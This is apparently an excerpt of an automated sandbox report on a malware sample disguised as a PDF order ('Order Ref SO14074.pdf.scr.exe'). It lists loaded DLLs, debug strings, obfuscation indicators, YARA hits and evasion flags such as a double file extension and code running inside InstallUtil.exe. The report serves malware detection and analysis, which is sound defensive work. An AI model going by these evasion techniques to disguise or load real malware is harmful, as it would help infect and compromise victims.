              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204903250.0000000007250000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001498000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbM source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204903250.0000000007250000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdby5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n8C:\Windows\InstallUtil.pdbf source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\InstallUtil.pdb] source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbte source: InstallUtil.exe, 00000003.00000002.3263166855.0000000005A70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbR source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: &ulUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbU5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbp source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbE source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001498000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbP source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, SortedRole.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ErjUCovaB5nmnsZvVRe.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ErjUCovaB5nmnsZvVRe.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ErjUCovaB5nmnsZvVRe.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, ListController.cs.Net Code: SortController System.AppDomain.Load(byte[])
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7140000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7140000.2.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7140000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7140000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7140000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: Yara matchFile source: 0.2.Order Ref SO14074.pdf.scr.exe.72b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2208868060.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Order Ref SO14074.pdf.scr.exe PID: 5988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5828, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_02A7E930 push esp; retf 0_2_02A7E9A6
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_02A7EE80 pushfd ; retf 0_2_02A7EE81
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_06509C6E push es; ret 0_2_06509C78
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_06500C00 push es; retf 0_2_06500C38
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_06509DBA push es; iretd 0_2_06509DBC
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07121896 push eax; ret 0_2_07121A21
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071218A8 push eax; ret 0_2_07121A21
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07198712 pushad ; iretd 0_2_07198719
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07190F0F push FFFFFF8Bh; iretd 0_2_07190F11
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719A10C push eax; ret 0_2_0719A112
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07197028 push 00064EC4h; ret 0_2_0719702D
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2B78 pushfd ; iretd 0_2_071A2B79
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2B9A pushfd ; iretd 0_2_071A2B9B
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2BBC pushfd ; iretd 0_2_071A2BBD
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2BDD pushfd ; iretd 0_2_071A2BDF
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2BFC pushfd ; iretd 0_2_071A2BFE
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A2C38 pushfd ; iretd 0_2_071A2C39
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A24D2 push FFFFFFA3h; iretd 0_2_071A24D4
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A88F6 push ebx; iretd 0_2_071A88F7
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07225730 push esp; iretd 0_2_07225731
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0724552D push FFFFFF8Bh; iretd 0_2_0724552F
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07245405 push FFFFFF8Bh; iretd 0_2_07245407
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072453B1 push FFFFFF8Bh; ret 0_2_072453B6
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072453EC push FFFFFF8Bh; ret 0_2_072453F0
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, gJBYkLWeTZbZeIk1p4.csHigh entropy of concatenated method names: 'tVZyhHBGj', 'ETRk2swih', 'sAHiDKXK0', 'Y8xRdKVnB', 'Sl7A1tSAl', 'yUHCCbeWo', 'lRwV8OICr', 'Y64hr4Mgq', 'UBM8PDNHn', 'vVohBl23umdcPkmdcX9'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, YXpAwFnwZDuyugVWjHg.csHigh entropy of concatenated method names: 'AO4ogLyBI9', 'QXqooMwHNO', 'Ugiof7NjGV', 'Ty1o6NUHPn', 'xqTo3m3uXe', 'qHYo79DJJ1', 'hcvoSpMwN1', 'yqlnkau2yj', 'GqhouEjbTL', 'auto2KVtOO'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, k2qu0s3WhJwnT4lRYY.csHigh entropy of concatenated method names: 'T2tjWnGWZ', 'VH7NBJX7E', 'HODqrAfaA', 'BXDYHHfuk', 'XKfS3bA14', 'sFTuqqGLJ', 'vQk2ZAp7U', 'Ie6wr3fDe', 'oK2BLZPrE', 'kQRcHIY6a'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ErjUCovaB5nmnsZvVRe.csHigh entropy of concatenated method names: 'KeJRXqBgGpcjRbMwkEL', 'UuB6tsBoAc7v6JOlOWd', 'KyW15abiNI', 'vh0ry9Sq2v', 'DqH1WtMvUl', 'UR51GoZrhh', 'Hyh1yaNfKU', 'NQS1kZfnUy', 'TomNguSc7Z', 'TdNvv6f4fN'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ybRBggn95ilboN0TWRg.csHigh entropy of concatenated method names: 'fYgnMwwDtg', 'C0engmIokH', 'qXknoJujj5', 'BXfnfkIEmJ', 'hTIn6V3Wxr', 'sMYn3cEgic', 'uCxn7p6eP3', 'CBgnSiasK1', 'bkZnuVJO5c', 'LfIn25Ly1c'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, gJBYkLWeTZbZeIk1p4.csHigh entropy of concatenated method names: 'tVZyhHBGj', 'ETRk2swih', 'sAHiDKXK0', 'Y8xRdKVnB', 'Sl7A1tSAl', 'yUHCCbeWo', 'lRwV8OICr', 'Y64hr4Mgq', 'UBM8PDNHn', 'vVohBl23umdcPkmdcX9'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, YXpAwFnwZDuyugVWjHg.csHigh entropy of concatenated method names: 'AO4ogLyBI9', 'QXqooMwHNO', 'Ugiof7NjGV', 'Ty1o6NUHPn', 'xqTo3m3uXe', 'qHYo79DJJ1', 'hcvoSpMwN1', 'yqlnkau2yj', 'GqhouEjbTL', 'auto2KVtOO'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, k2qu0s3WhJwnT4lRYY.csHigh entropy of concatenated method names: 'T2tjWnGWZ', 'VH7NBJX7E', 'HODqrAfaA', 'BXDYHHfuk', 'XKfS3bA14', 'sFTuqqGLJ', 'vQk2ZAp7U', 'Ie6wr3fDe', 'oK2BLZPrE', 'kQRcHIY6a'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ErjUCovaB5nmnsZvVRe.csHigh entropy of concatenated method names: 'KeJRXqBgGpcjRbMwkEL', 'UuB6tsBoAc7v6JOlOWd', 'KyW15abiNI', 'vh0ry9Sq2v', 'DqH1WtMvUl', 'UR51GoZrhh', 'Hyh1yaNfKU', 'NQS1kZfnUy', 'TomNguSc7Z', 'TdNvv6f4fN'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ybRBggn95ilboN0TWRg.csHigh entropy of concatenated method names: 'fYgnMwwDtg', 'C0engmIokH', 'qXknoJujj5', 'BXfnfkIEmJ', 'hTIn6V3Wxr', 'sMYn3cEgic', 'uCxn7p6eP3', 'CBgnSiasK1', 'bkZnuVJO5c', 'LfIn25Ly1c'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, gJBYkLWeTZbZeIk1p4.csHigh entropy of concatenated method names: 'tVZyhHBGj', 'ETRk2swih', 'sAHiDKXK0', 'Y8xRdKVnB', 'Sl7A1tSAl', 'yUHCCbeWo', 'lRwV8OICr', 'Y64hr4Mgq', 'UBM8PDNHn', 'vVohBl23umdcPkmdcX9'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, YXpAwFnwZDuyugVWjHg.csHigh entropy of concatenated method names: 'AO4ogLyBI9', 'QXqooMwHNO', 'Ugiof7NjGV', 'Ty1o6NUHPn', 'xqTo3m3uXe', 'qHYo79DJJ1', 'hcvoSpMwN1', 'yqlnkau2yj', 'GqhouEjbTL', 'auto2KVtOO'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, k2qu0s3WhJwnT4lRYY.csHigh entropy of concatenated method names: 'T2tjWnGWZ', 'VH7NBJX7E', 'HODqrAfaA', 'BXDYHHfuk', 'XKfS3bA14', 'sFTuqqGLJ', 'vQk2ZAp7U', 'Ie6wr3fDe', 'oK2BLZPrE', 'kQRcHIY6a'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ErjUCovaB5nmnsZvVRe.csHigh entropy of concatenated method names: 'KeJRXqBgGpcjRbMwkEL', 'UuB6tsBoAc7v6JOlOWd', 'KyW15abiNI', 'vh0ry9Sq2v', 'DqH1WtMvUl', 'UR51GoZrhh', 'Hyh1yaNfKU', 'NQS1kZfnUy', 'TomNguSc7Z', 'TdNvv6f4fN'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ybRBggn95ilboN0TWRg.csHigh entropy of concatenated method names: 'fYgnMwwDtg', 'C0engmIokH', 'qXknoJujj5', 'BXfnfkIEmJ', 'hTIn6V3Wxr', 'sMYn3cEgic', 'uCxn7p6eP3', 'CBgnSiasK1', 'bkZnuVJO5c', 'LfIn25Ly1c'

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: Possible double extension: pdf.scrStatic PE information: Order Ref SO14074.pdf.scr.exe
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
